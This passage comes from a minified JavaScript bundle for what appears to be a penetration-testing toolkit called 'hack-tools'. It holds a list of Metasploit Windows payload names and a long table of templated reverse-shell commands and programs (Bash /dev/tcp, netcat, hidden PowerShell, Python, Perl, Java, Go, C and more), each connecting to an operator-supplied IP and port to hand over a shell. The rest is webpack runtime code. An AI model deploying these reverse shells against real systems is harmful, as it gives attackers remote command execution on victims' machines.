ws/patchupdllinject/bind_ipv6_tcp_uuid"},{"value":"windows/patchupdllinject/bind_named_pipe"},{"value":"windows/patchupdllinject/bind_nonx_tcp"},{"value":"windows/patchupdllinject/bind_tcp"},{"value":"windows/patchupdllinject/bind_tcp_rc4"},{"value":"windows/patchupdllinject/bind_tcp_uuid"},{"value":"windows/patchupdllinject/find_tag"},{"value":"windows/patchupdllinject/reverse_ipv6_tcp"},{"value":"windows/patchupdllinject/reverse_nonx_tcp"},{"value":"windows/patchupdllinject/reverse_ord_tcp"},{"value":"windows/patchupdllinject/reverse_tcp"},{"value":"windows/patchupdllinject/reverse_tcp_allports"},{"value":"windows/patchupdllinject/reverse_tcp_dns"},{"value":"windows/patchupdllinject/reverse_tcp_rc4"},{"value":"windows/patchupdllinject/reverse_tcp_rc4_dns"},{"value":"windows/patchupdllinject/reverse_tcp_uuid"},{"value":"windows/patchupdllinject/reverse_udp"},{"value":"windows/patchupmeterpreter/bind_hidden_ipknock_tcp"},{"value":"windows/patchupmeterpreter/bind_hidden_tcp"},{"value":"windows/patchupmeterpreter/bind_ipv6_tcp"},{"value":"windows/patchupmeterpreter/bind_ipv6_tcp_uuid"},{"value":"windows/patchupmeterpreter/bind_named_pipe"},{"value":"windows/patchupmeterpreter/bind_nonx_tcp"},{"value":"windows/patchupmeterpreter/bind_tcp"},{"value":"windows/patchupmeterpreter/bind_tcp_rc4"},{"value":"windows/patchupmeterpreter/bind_tcp_uuid"},{"value":"windows/patchupmeterpreter/find_tag"},{"value":"windows/patchupmeterpreter/reverse_ipv6_tcp"},{"value":"windows/patchupmeterpreter/reverse_nonx_tcp"},{"value":"windows/patchupmeterpreter/reverse_ord_tcp"},{"value":"windows/patchupmeterpreter/reverse_tcp"},{"value":"windows/patchupmeterpreter/reverse_tcp_allports"},{"value":"windows/patchupmeterpreter/reverse_tcp_dns"},{"value":"windows/patchupmeterpreter/reverse_tcp_rc4"},{"value":"windows/patchupmeterpreter/reverse_tcp_rc4_dns"},{"value":"windows/patchupmeterpreter/reverse_tcp_uuid"},{"value":"windows/patchupmeterpreter/reverse_udp"},{"value":"windows/powershell_bind_tcp"},{"value":"windows/powershell_reverse_tcp"},{"value":"windows/shell/bind_hidden_ipknock_tcp"},{"value":"windows/shell/bind_hidden_tcp"},{"value":"windows/shell/bind_ipv6_tcp"},{"value":"windows/shell/bind_ipv6_tcp_uuid"},{"value":"windows/shell/bind_named_pipe"},{"value":"windows/shell/bind_nonx_tcp"},{"value":"windows/shell/bind_tcp"},{"value":"windows/shell/bind_tcp_rc4"},{"value":"windows/shell/bind_tcp_uuid"},{"value":"windows/shell/find_tag"},{"value":"windows/shell/reverse_ipv6_tcp"},{"value":"windows/shell/reverse_nonx_tcp"},{"value":"windows/shell/reverse_ord_tcp"},{"value":"windows/shell/reverse_tcp"},{"value":"windows/shell/reverse_tcp_allports"},{"value":"windows/shell/reverse_tcp_dns"},{"value":"windows/shell/reverse_tcp_rc4"},{"value":"windows/shell/reverse_tcp_rc4_dns"},{"value":"windows/shell/reverse_tcp_uuid"},{"value":"windows/shell/reverse_udp"},{"value":"windows/shell_bind_tcp"},{"value":"windows/shell_bind_tcp_xpfw"},{"value":"windows/shell_hidden_bind_tcp"},{"value":"windows/shell_reverse_tcp"},{"value":"windows/speak_pwned"},{"value":"windows/upexec/bind_hidden_ipknock_tcp"},{"value":"windows/upexec/bind_hidden_tcp"},{"value":"windows/upexec/bind_ipv6_tcp"},{"value":"windows/upexec/bind_ipv6_tcp_uuid"},{"value":"windows/upexec/bind_named_pipe"},{"value":"windows/upexec/bind_nonx_tcp"},{"value":"windows/upexec/bind_tcp"},{"value":"windows/upexec/bind_tcp_rc4"},{"value":"windows/upexec/bind_tcp_uuid"},{"value":"windows/upexec/find_tag"},{"value":"windows/upexec/reverse_ipv6_tcp"},{"value":"windows/upexec/reverse_nonx_tcp"},{"value":"windows/upexec/reverse_ord_tcp"},{"value":"windows/upexec/reverse_tcp"},{"value":"windows/upexec/reverse_tcp_allports"},{"value":"windows/upexec/reverse_tcp_dns"},{"value":"windows/upexec/reverse_tcp_rc4"},{"value":"windows/upexec/reverse_tcp_rc4_dns"},{"value":"windows/upexec/reverse_tcp_uuid"},{"value":"windows/upexec/reverse_udp"},{"value":"windows/vncinject/bind_hidden_ipknock_tcp"},{"value":"windows/vncinject/bind_hidden_tcp"},{"value":"windows/vncinject/bind_ipv6_tcp"},{"value":"windows/vncinject/bind_ipv6_tcp_uuid"},{"value":"windows/vncinject/bind_named_pipe"},{"value":"windows/vncinject/bind_nonx_tcp"},{"value":"windows/vncinject/bind_tcp"},{"value":"windows/vncinject/bind_tcp_rc4"},{"value":"windows/vncinject/bind_tcp_uuid"},{"value":"windows/vncinject/find_tag"},{"value":"windows/vncinject/reverse_hop_http"},{"value":"windows/vncinject/reverse_http"},{"value":"windows/vncinject/reverse_http_proxy_pstore"},{"value":"windows/vncinject/reverse_ipv6_tcp"},{"value":"windows/vncinject/reverse_nonx_tcp"},{"value":"windows/vncinject/reverse_ord_tcp"},{"value":"windows/vncinject/reverse_tcp"},{"value":"windows/vncinject/reverse_tcp_allports"},{"value":"windows/vncinject/reverse_tcp_dns"},{"value":"windows/vncinject/reverse_tcp_rc4"},{"value":"windows/vncinject/reverse_tcp_rc4_dns"},{"value":"windows/vncinject/reverse_tcp_uuid"},{"value":"windows/vncinject/reverse_udp"},{"value":"windows/vncinject/reverse_winhttp"},{"value":"windows/x64/exec"},{"value":"windows/x64/loadlibrary"},{"value":"windows/x64/meterpreter/bind_ipv6_tcp"},{"value":"windows/x64/meterpreter/bind_ipv6_tcp_uuid"},{"value":"windows/x64/meterpreter/bind_named_pipe"},{"value":"windows/x64/meterpreter/bind_tcp"},{"value":"windows/x64/meterpreter/bind_tcp_uuid"},{"value":"windows/x64/meterpreter/reverse_http"},{"value":"windows/x64/meterpreter/reverse_https"},{"value":"windows/x64/meterpreter/reverse_named_pipe"},{"value":"windows/x64/meterpreter/reverse_tcp"},{"value":"windows/x64/meterpreter/reverse_tcp_rc4"},{"value":"windows/x64/meterpreter/reverse_tcp_uuid"},{"value":"windows/x64/meterpreter/reverse_winhttp"},{"value":"windows/x64/meterpreter/reverse_winhttps"},{"value":"windows/x64/meterpreter_bind_named_pipe"},{"value":"windows/x64/meterpreter_bind_tcp"},{"value":"windows/x64/meterpreter_reverse_http"},{"value":"windows/x64/meterpreter_reverse_https"},{"value":"windows/x64/meterpreter_reverse_ipv6_tcp"},{"value":"windows/x64/meterpreter_reverse_tcp"},{"value":"windows/x64/powershell_bind_tcp"},{"value":"windows/x64/powershell_reverse_tcp"},{"value":"windows/x64/shell/bind_ipv6_tcp"},{"value":"windows/x64/shell/bind_ipv6_tcp_uuid"},{"value":"windows/x64/shell/bind_named_pipe"},{"value":"windows/x64/shell/bind_tcp"},{"value":"windows/x64/shell/bind_tcp_uuid"},{"value":"windows/x64/shell/reverse_tcp"},{"value":"windows/x64/shell/reverse_tcp_rc4"},{"value":"windows/x64/shell/reverse_tcp_uuid"},{"value":"windows/x64/shell_bind_tcp"},{"value":"windows/x64/shell_reverse_tcp"},{"value":"windows/x64/vncinject/bind_ipv6_tcp"},{"value":"windows/x64/vncinject/bind_ipv6_tcp_uuid"},{"value":"windows/x64/vncinject/bind_named_pipe"},{"value":"windows/x64/vncinject/bind_tcp"},{"value":"windows/x64/vncinject/bind_tcp_uuid"},{"value":"windows/x64/vncinject/reverse_http"},{"value":"windows/x64/vncinject/reverse_https"},{"value":"windows/x64/vncinject/reverse_tcp"},{"value":"windows/x64/vncinject/reverse_tcp_rc4"},{"value":"windows/x64/vncinject/reverse_tcp_uuid"},{"value":"windows/x64/vncinject/reverse_winhttp"},{"value":"windows/x64/vncinject/reverse_winhttps"}]')},341:function(e){"use strict";e.exports=JSON.parse('[{"value":"aix"},{"value":"android"},{"value":"apple_ios"},{"value":"bsd"},{"value":"bsdi"},{"value":"cisco"},{"value":"firefox"},{"value":"freebsd"},{"value":"hardware"},{"value":"hpux"},{"value":"irix"},{"value":"java"},{"value":"javascript"},{"value":"juniper"},{"value":"linux"},{"value":"mainframe"},{"value":"multi"},{"value":"netbsd"},{"value":"netware"},{"value":"nodejs"},{"value":"openbsd"},{"value":"osx"},{"value":"php"},{"value":"python"},{"value":"r"},{"value":"ruby"},{"value":"solaris"},{"value":"unix"},{"value":"windows"}]')},23191:function(e){"use strict";e.exports=JSON.parse('[{"name":"Bash -i","command":"{shell} -i >& /dev/tcp/${values.ip}/${values.port} 0>&1","tags":["linux","mac"]},{"name":"Bash 196","command":"0<&196;exec 196<>/dev/tcp/${values.ip}/${values.port}; {shell} <&196 >&196 2>&196","tags":["linux","mac"]},{"name":"Bash read line","command":"exec 5<>/dev/tcp/${values.ip}/${values.port};cat <&5 | while read line; do $line 2>&5 >&5; done","tags":["linux","mac"]},{"name":"Bash 5","command":"{shell} -i 5<> /dev/tcp/${values.ip}/${values.port} 0<&5 1>&5 2>&5","tags":["linux","mac"]},{"name":"Bash udp","command":"{shell} -i >& /dev/udp/${values.ip}/${values.port} 0>&1","tags":["linux","mac"]},{"name":"nc mkfifo","command":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc ${values.ip} ${values.port} >/tmp/f","tags":["linux","mac"]},{"name":"nc -e","command":"nc ${values.ip} ${values.port} -e {shell}","tags":["linux","mac"]},{"name":"nc.exe -e","command":"nc.exe ${values.ip} ${values.port} -e {shell}","tags":["windows"]},{"name":"nc -c","command":"nc -c {shell} ${values.ip} ${values.port}","tags":["linux","mac"]},{"name":"ncat -e","command":"ncat ${values.ip} ${values.port} -e {shell}","tags":["linux","mac"]},{"name":"ncat.exe -e","command":"ncat.exe ${values.ip} ${values.port} -e {shell}","tags":["windows"]},{"name":"ncat udp","command":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|ncat -u ${values.ip} ${values.port} >/tmp/f","tags":["linux","mac"]},{"name":"rustcat","command":"rcat ${values.ip} ${values.port} -r {shell}","tags":["linux","mac"]},{"name":"Haskell #1","command":"module Main where\\n\\nimport System.Process\\n\\nmain = callCommand \\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | {shell} -i 2>&1 | nc ${values.ip} ${values.port} >/tmp/f\\"","tags":["linux","mac"]},{"name":"Perl","command":"perl -e \'use Socket;$i=\\"${values.ip}\\";$p=${values.port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\\"tcp\\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\\">&S\\");open(STDOUT,\\">&S\\");open(STDERR,\\">&S\\");exec(\\"{shell} -i\\");};\'","tags":["linux","mac"]},{"name":"Perl no sh","command":"perl -MIO -e \'$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\\"${values.ip}:${values.port}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\'","tags":["linux","mac"]},{"name":"PowerShell #1","command":"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\\"${values.ip}\\",${values.port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \\"PS \\" + (pwd).Path + \\"> \\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()","tags":["windows"]},{"name":"PowerShell #2","command":"powershell -nop -c \\"$client = New-Object System.Net.Sockets.TCPClient(\'${values.ip}\',${values.port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"","tags":["windows"]},{"name":"PowerShell #3","command":"powershell -nop -W hidden -noni -ep bypass -c \\"$TCPClient = New-Object Net.Sockets.TCPClient(\'${values.ip}\', ${values.port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + \'SHELL> \');$StreamWriter.Flush()}WriteToStream \'\';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\\"","tags":["windows"]},{"name":"PowerShell #4 (TLS)","command":"powershell -nop -W hidden -noni -ep bypass -c \\"$TCPClient = New-Object Net.Sockets.TCPClient(\'${values.ip}\', ${values.port});$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient(\'cloudflare-dns.com\',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + \'SHELL> \');$StreamWriter.Flush()};WriteToStream \'\';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\\"","tags":["windows"]},{"name":"Python #1","command":"export RHOST=\\"${values.ip}\\";export RPORT=${values.port};python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\"RHOST\\"),int(os.getenv(\\"RPORT\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\"{shell}\\")\'","tags":["linux","mac"]},{"name":"Python #2","command":"python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"${values.ip}\\",${values.port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"{shell}\\")\'","tags":["linux","mac"]},{"name":"Python3 #1","command":"export RHOST=\\"${values.ip}\\";export RPORT=${values.port};python3 -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\\"RHOST\\"),int(os.getenv(\\"RPORT\\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\"{shell}\\")\'","tags":["linux","mac"]},{"name":"Python3 #2","command":"python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"${values.ip}\\",${values.port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"{shell}\\")\'","tags":["linux","mac"]},{"name":"Python3 Windows","command":"import os,socket,subprocess,threading;\\ndef s2p(s, p):\\n while True:\\n data = s.recv(1024)\\n if len(data) > 0:\\n p.stdin.write(data)\\n p.stdin.flush()\\n\\ndef p2s(s, p):\\n while True:\\n s.send(p.stdout.read(1))\\n\\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\\ns.connect((\\"${values.ip}\\",${values.port}))\\n\\np=subprocess.Popen([\\"{shell}\\"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)\\n\\ns2p_thread = threading.Thread(target=s2p, args=[s, p])\\ns2p_thread.daemon = True\\ns2p_thread.start()\\n\\np2s_thread = threading.Thread(target=p2s, args=[s, p])\\np2s_thread.daemon = True\\np2s_thread.start()\\n\\ntry:\\n p.wait()\\nexcept KeyboardInterrupt:\\n s.close()","tags":["windows"]},{"name":"Python3 shortest","command":"python3 -c \'import os,pty,socket;s=socket.socket();s.connect((\\"${values.ip}\\",${values.port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"{shell}\\")\'","tags":["linux"]},{"name":"Ruby #1","command":"ruby -rsocket -e\'spawn(\\"sh\\",[:in,:out,:err]=>TCPSocket.new(\\"${values.ip}\\",${values.port}))\'","tags":["linux","mac"]},{"name":"Ruby no sh","command":"ruby -rsocket -e\'exit if fork;c=TCPSocket.new(\\"${values.ip}\\",\\"${values.port}\\");loop{c.gets.chomp!;(exit! if $_==\\"exit\\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \\"failed: #{$_}\\"}\'","tags":["linux","mac"]},{"name":"socat #1","command":"socat TCP:${values.ip}:${values.port} EXEC:{shell}","tags":["linux","mac"]},{"name":"socat #2 (TTY)","command":"socat TCP:${values.ip}:${values.port} EXEC:\'{shell}\',pty,stderr,setsid,sigint,sane","tags":["linux","mac"]},{"name":"node.js","command":"require(\'child_process\').exec(\'nc -e {shell} ${values.ip} ${values.port}\')","tags":["linux","mac"]},{"name":"node.js #2","command":"(function(){\\r\\n var net = require(\\"net\\"),\\r\\n cp = require(\\"child_process\\"),\\r\\n sh = cp.spawn(\\"\\\\{shell}\\", []);\\r\\n var client = new net.Socket();\\r\\n client.connect(${values.port}, \\"${values.ip}\\", function(){\\r\\n client.pipe(sh.stdin);\\r\\n sh.stdout.pipe(client);\\r\\n sh.stderr.pipe(client);\\r\\n });\\r\\n return /a/; // Prevents the Node.js application from crashing\\r\\n})();","tags":["linux","mac","windows"]},{"name":"Java #1","command":"public class shell {\\n public static void main(String[] args) {\\n Process p;\\n try {\\n p = Runtime.getRuntime().exec(\\"bash -c $@|bash 0 echo bash -i >& /dev/tcp/${values.ip}/${values.port} 0>&1\\");\\n p.waitFor();\\n p.destroy();\\n } catch (Exception e) {}\\n }\\n}","tags":["linux","mac"]},{"name":"Java #2","command":"public class shell {\\n public static void main(String[] args) {\\n ProcessBuilder pb = new ProcessBuilder(\\"bash\\", \\"-c\\", \\"$@| bash -i >& /dev/tcp/${values.ip}/${values.port} 0>&1\\")\\n .redirectErrorStream(true);\\n try {\\n Process p = pb.start();\\n p.waitFor();\\n p.destroy();\\n } catch (Exception e) {}\\n }\\n}","tags":["linux","mac"]},{"name":"Java #3","command":"import java.io.InputStream;\\nimport java.io.OutputStream;\\nimport java.net.Socket;\\n\\npublic class shell {\\n public static void main(String[] args) {\\n String host = \\"${values.ip}\\";\\n int port = ${values.port};\\n String cmd = \\"{shell}\\";\\n try {\\n Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();\\n Socket s = new Socket(host, port);\\n InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\\n OutputStream po = p.getOutputStream(), so = s.getOutputStream();\\n while (!s.isClosed()) {\\n while (pi.available() > 0)\\n so.write(pi.read());\\n while (pe.available() > 0)\\n so.write(pe.read());\\n while (si.available() > 0)\\n po.write(si.read());\\n so.flush();\\n po.flush();\\n Thread.sleep(50);\\n try {\\n p.exitValue();\\n break;\\n } catch (Exception e) {}\\n }\\n p.destroy();\\n s.close();\\n } catch (Exception e) {}\\n }\\n}","tags":["windows","linux","mac"]},{"name":"Javascript","command":"String command = \\"var host = \\\\\'${values.ip}\\\\\';\\" +\\r\\n \\"var port = ${values.port};\\" +\\r\\n \\"var cmd = \\\\\'{shell}\\\\\';\\"+\\r\\n \\"var s = new java.net.Socket(host, port);\\" +\\r\\n \\"var p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();\\"+\\r\\n \\"var pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();\\"+\\r\\n \\"var po = p.getOutputStream(), so = s.getOutputStream();\\"+\\r\\n \\"print (\\\\\'Connected\\\\\');\\"+\\r\\n \\"while (!s.isClosed()) {\\"+\\r\\n \\" while (pi.available() > 0)\\"+\\r\\n \\" so.write(pi.read());\\"+\\r\\n \\" while (pe.available() > 0)\\"+\\r\\n \\" so.write(pe.read());\\"+\\r\\n \\" while (si.available() > 0)\\"+\\r\\n \\" po.write(si.read());\\"+\\r\\n \\" so.flush();\\"+\\r\\n \\" po.flush();\\"+\\r\\n \\" java.lang.Thread.sleep(50);\\"+\\r\\n \\" try {\\"+\\r\\n \\" p.exitValue();\\"+\\r\\n \\" break;\\"+\\r\\n \\" }\\"+\\r\\n \\" catch (e) {\\"+\\r\\n \\" }\\"+\\r\\n \\"}\\"+\\r\\n \\"p.destroy();\\"+\\r\\n \\"s.close();\\";\\r\\nString x = \\"\\\\\\"\\\\\\".getClass().forName(\\\\\\"javax.script.ScriptEngineManager\\\\\\").newInstance().getEngineByName(\\\\\\"JavaScript\\\\\\").eval(\\\\\\"\\"+command+\\"\\\\\\")\\";\\r\\nref.add(new StringRefAddr(\\"x\\", x);","tags":["linux","mac","windows"]},{"name":"Groovy","command":"String host=\\"${values.ip}\\";int port=${values.port};String cmd=\\"{shell}\\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();","tags":["windows"]},{"name":"telnet","command":"TF=$(mktemp -u);mkfifo $TF && telnet ${values.ip} ${values.port} 0<$TF | {shell} 1>$TF","tags":["linux","mac"]},{"name":"zsh","command":"zsh -c \'zmodload zsh/net/tcp && ztcp ${values.ip} ${values.port} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY\'","tags":["linux","mac"]},{"name":"Lua #1","command":"lua -e \\"require(\'socket\');require(\'os\');t=socket.tcp();t:connect(\'${values.ip}\',\'${values.port}\');os.execute(\'{shell} -i <&3 >&3 2>&3\');\\"","tags":["linux"]},{"name":"Lua #2","command":"lua5.1 -e \'local host, port = \\"${values.ip}\\", ${values.port} local socket = require(\\"socket\\") local tcp = socket.tcp() local io = require(\\"io\\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \\"r\\") local s = f:read(\\"*a\\") f:close() tcp:send(s) if status == \\"closed\\" then break end end tcp:close()\'","tags":["linux","windows"]},{"name":"Golang","command":"echo \'package main;import\\"os/exec\\";import\\"net\\";func main(){c,_:=net.Dial(\\"tcp\\",\\"${values.ip}:${values.port}\\");cmd:=exec.Command(\\"{shell}\\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go","tags":["linux","mac","windows"]},{"name":"Vlang","command":"echo \'import os\' > /tmp/t.v && echo \'fn main() { os.system(\\"nc -e {shell} ${values.ip} ${values.port} 0>&1\\") }\' >> /tmp/t.v && v run /tmp/t.v && rm /tmp/t.v","tags":["linux","mac"]},{"name":"Awk","command":"awk \'BEGIN {s = \\"/inet/tcp/0/${values.ip}/${values.port}\\"; while(42) { do{ printf \\"shell>\\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \\"exit\\") close(s); }}\' /dev/null","tags":["linux","mac"]},{"name":"Dart","command":"import \'dart:io\';\\nimport \'dart:convert\';\\n\\nmain() {\\n Socket.connect(\\"${values.ip}\\", ${values.port}).then((socket) {\\n socket.listen((data) {\\n Process.start(\'{shell}\', []).then((Process process) {\\n process.stdin.writeln(new String.fromCharCodes(data).trim());\\n process.stdout\\n .transform(utf8.decoder)\\n .listen((output) { socket.write(output); });\\n });\\n },\\n onDone: () {\\n socket.destroy();\\n });\\n });\\n}","tags":["linux","mac","windows"]},{"name":"Rust","command":"use std::net::TcpStream;\\nuse std::os::unix::io::{AsRawFd, FromRawFd};\\nuse std::process::{Command, Stdio};\\n\\nfn main() {\\n let s = TcpStream::connect(\\"${values.ip}:${values.port}\\").unwrap();\\n let fd = s.as_raw_fd();\\n Command::new(\\"{shell}\\")\\n .arg(\\"-i\\")\\n .stdin(unsafe { Stdio::from_raw_fd(fd) })\\n .stdout(unsafe { Stdio::from_raw_fd(fd) })\\n .stderr(unsafe { Stdio::from_raw_fd(fd) })\\n .spawn()\\n .unwrap()\\n .wait()\\n .unwrap();\\n}","tags":["linux","mac","windows"]},{"name":"C","command":"#include <stdio.h>\\n#include <unistd.h>\\n#include <netinet/in.h>\\n#include <sys/types.h>\\n#include <sys/socket.h>\\n\\n#define REMOTE_ADDR \\"${values.ip}\\"\\n#define REMOTE_PORT ${values.port} \\n\\nint main(int argc, char *argv[])\\n{\\n struct sockaddr_in sa;\\n int s;\\n\\n sa.sin_family = AF_INET;\\n sa.sin_addr.s_addr = inet_addr(REMOTE_ADDR);\\n sa.sin_port = htons(REMOTE_PORT);\\n\\n s = socket(AF_INET, SOCK_STREAM, 0);\\n connect(s, (struct sockaddr *)&sa, sizeof(sa));\\n dup2(s, 0);\\n dup2(s, 1);\\n dup2(s, 2);\\n\\n execve(\\"{shell}\\", 0, 0);\\n return 0;\\n}","tags":["linux","mac","windows"]}]')}},i={};function o(e){var t=i[e];if(void 0!==t){if(void 0!==t.error)throw t.error;return t.exports}var l=i[e]={id:e,exports:{}};try{var a={id:e,module:l,factory:r[e],require:o};o.i.forEach((function(e){e(a)})),l=a.module,a.factory.call(l.exports,l,l.exports,a.require)}catch(e){throw l.error=e,e}return l.exports}o.m=r,o.c=i,o.i=[],e=[],o.O=function(t,l,a,n){if(!l){var r=1/0;for(s=0;s<e.length;s++){l=e[s][0],a=e[s][1],n=e[s][2];for(var i=!0,c=0;c<l.length;c++)(!1&n||r>=n)&&Object.keys(o.O).every((function(e){return o.O[e](l[c])}))?l.splice(c--,1):(i=!1,n<r&&(r=n));if(i){e.splice(s--,1);var u=a();void 0!==u&&(t=u)}}return t}n=n||0;for(var s=e.length;s>0&&e[s-1][2]>n;s--)e[s]=e[s-1];e[s]=[l,a,n]},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,{a:t}),t},l=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},o.t=function(e,a){if(1&a&&(e=this(e)),8&a)return e;if("object"==typeof e&&e){if(4&a&&e.__esModule)return e;if(16&a&&"function"==typeof e.then)return e}var n=Object.create(null);o.r(n);var r={};t=t||[null,l({}),l([]),l(l)];for(var i=2&a&&e;"object"==typeof i&&!~t.indexOf(i);i=l(i))Object.getOwnPropertyNames(i).forEach((function(t){r[t]=function(){return e[t]}}));return r.default=function(){return e},o.d(n,r),n},o.d=function(e,t){for(var l in t)o.o(t,l)&&!o.o(e,l)&&Object.defineProperty(e,l,{enumerable:!0,get:t[l]})},o.hu=function(e){return e+"."+o.h()+".hot-update.js"},o.hmrF=function(){return"app."+o.h()+".hot-update.json"},o.h=function(){return"10c6bf67caf9450b9615"},o.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},a={},n="hack-tools:",o.l=function(e,t,l,r){if(a[e])a[e].push(t);else{var i,c;if(void 0!==l)for(var u=document.getElementsByTagName("script"),s=0;s<u.length;s++){var d=u[s];if(d.getAttribute("src")==e||d.getAttribute("data-webpack")==n+l){i=d;break}}i||(c=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,o.nc&&i.setAttribute("nonce",o.nc),i.setAttribute("data-webpack",n+l),i.src=e),a[e]=[t];var p=function(t,l){i.onerror=i.onload=null,clearTimeout(m);var n=a[e];if(delete a[e],i.parentNode&&i.parentNode.removeChild(i),n&&n.forEach((function(e){return e(l)})),t)return t(l)},m=setTimeout(p.bind(null,void 0,{type:"timeout",target:i}),12e4);i.onerror=p.bind(null,i.onerror),i.onload=p.bind(null,i.onload),c&&document.head.appendChild(i)}},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},function(){var e,t,l,a={},n=o.c,r=[],i=[],c="idle",u=0,s=[];function d(e){c=e;for(var t=[],l=0;l<i.length;l++)t[l]=i[l].call(null,e);return Promise.all(t)}function p(){0==--u&&d("ready").then((function(){if(0===u){var e=s;s=[];for(var t=0;t<e.length;t++)e[t]()}}))}function m(e){if("idle"!==c)throw new Error("check() is only allowed in idle status");return d("check").then(o.hmrM).then((function(l){return l?d("prepare").then((function(){var a=[];return t=[],Promise.all(Object.keys(o.hmrC).reduce((function(e,n){return o.hmrC[n](l.c,l.r,l.m,e,t,a),e}),[])).then((function(){return t=function(){return e?v(e):d("ready").then((function(){return a}))},0===u?t():new Promise((function(e){s.push((function(){e(t())}))}));var t}))})):d(h()?"ready":"idle").then((function(){return null}))}))}function f(e){return"ready"!==c?Promise.resolve().then((function(){throw new Error("apply() is only allowed in ready status (state: "+c+")")})):v(e)}function v(e){e=e||{},h();var a=t.map((function(t){return t(e)}));t=void 0;var n=a.map((function(e){return e.error})).filter(Boolean);if(n.length>0)return d("abort").then((function(){throw n[0]}));var r=d("dispose");a.forEach((function(e){e.dispose&&e.dispose()}));var i,o=d("apply"),c=function(e){i||(i=e)},u=[];return 